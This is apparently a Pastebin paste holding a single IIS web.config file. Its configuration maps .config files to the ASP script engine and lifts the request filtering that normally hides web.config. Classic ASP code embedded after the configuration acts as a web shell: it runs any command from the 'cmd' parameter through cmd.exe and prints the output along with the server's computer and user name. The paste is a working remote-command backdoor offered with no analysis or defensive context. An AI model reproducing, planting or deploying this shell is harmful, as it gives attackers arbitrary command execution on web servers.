Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?xml version="1.0" encoding="UTF-8"?>
- <configuration>
- <system.webServer>
- <handlers accessPolicy="Read, Script, Write">
- <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
- </handlers>
- <security>
- <requestFiltering>
- <fileExtensions>
- <remove fileExtension=".config" />
- </fileExtensions>
- <hiddenSegments>
- <remove segment="web.config" />
- </hiddenSegments>
- </requestFiltering>
- </security>
- </system.webServer>
- </configuration>
- <%
- Set oScript = Server.CreateObject("WSCRIPT.SHELL")
- Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
- Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- szCMD = request("cmd")
- If (szCMD <> "") Then
- szTempFile = "c:\inetpub\wwwroot\uploadedfiles\" & oFileSys.GetTempName( )
- Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
- End If
- %>
- <HTML>
- <BODY>
- <FORM action="" method="GET">
- <input type="text" name="cmd" size=45 value="<%= szCMD %>">
- <input type="submit" value="Run">
- </FORM>
- <PRE>
- <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- <br>
- <%
- If (IsObject(oFile)) Then
- On Error Resume Next
- Response.Write Server.HTMLEncode(oFile.ReadAll)
- oFile.Close
- Call oFileSys.DeleteFile(szTempFile, True)
- End If
- %>
- </BODY>
- </HTML>
Add Comment
Please, Sign In to add comment